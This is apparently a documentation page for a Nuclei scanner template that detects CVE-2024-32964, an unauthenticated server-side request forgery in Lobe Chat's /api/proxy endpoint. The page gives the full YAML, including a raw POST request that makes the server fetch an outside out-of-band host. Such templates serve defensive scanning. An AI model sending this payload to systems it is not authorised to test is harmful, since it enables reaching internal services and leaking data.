Skip to content
Nuclei Templates

Lobe Chat <= v0.150.5 - Server-Side Request Forgery

ID: CVE-2024-32964

Severity: critical

Author: s4e-io

Tags: cve,cve2024,lobechat,ssrf

Description

Section titled “Description”

Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.

YAML Source

Section titled “YAML Source”
id: CVE-2024-32964


info:
  name: Lobe Chat <= v0.150.5 - Server-Side Request Forgery
  author: s4e-io
  severity: critical
  description: |
    Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32964
    - https://github.com/lobehub/lobe-chat/commit/465665a735556669ee30446c7ea9049a20cc7c37
    - https://github.com/lobehub/lobe-chat/security/advisories/GHSA-mxhq-xw3g-rphc
    - https://vulert.com/vuln-db/CVE-2024-32964
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H
    cvss-score: 9
    cve-id: CVE-2024-32964
    cwe-id: CWE-918
    epss-score: 0.00043
    epss-percentile: 0.09599
  metadata:
    verified: true
    max-request: 2
    vendor: lobehub
    product: lobe-chat
    fofa-query: icon_hash="1975020705"
  tags: cve,cve2024,lobechat,ssrf


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /welcome HTTP/1.1
        Host: {{Hostname}}


    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "lobechat")'
          - 'status_code == 200'
        condition: and
        internal: true


  - raw:
      - |
        POST /api/proxy HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain


        http://oast.me


    matchers:
      - type: word
        part: response
        words:
          - "<h1> Interactsh Server </h1>"
# digest: 4a0a0047304502202af38132bdcc7829f34aded7e0541ea8bd23cd0a1045f9af9e06c91ac84a9a2a022100e26d86c7cf2b2237d2278501275c1d730fd82afa8ce238680cfce74ed459c43c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-32964.yaml"

View on Github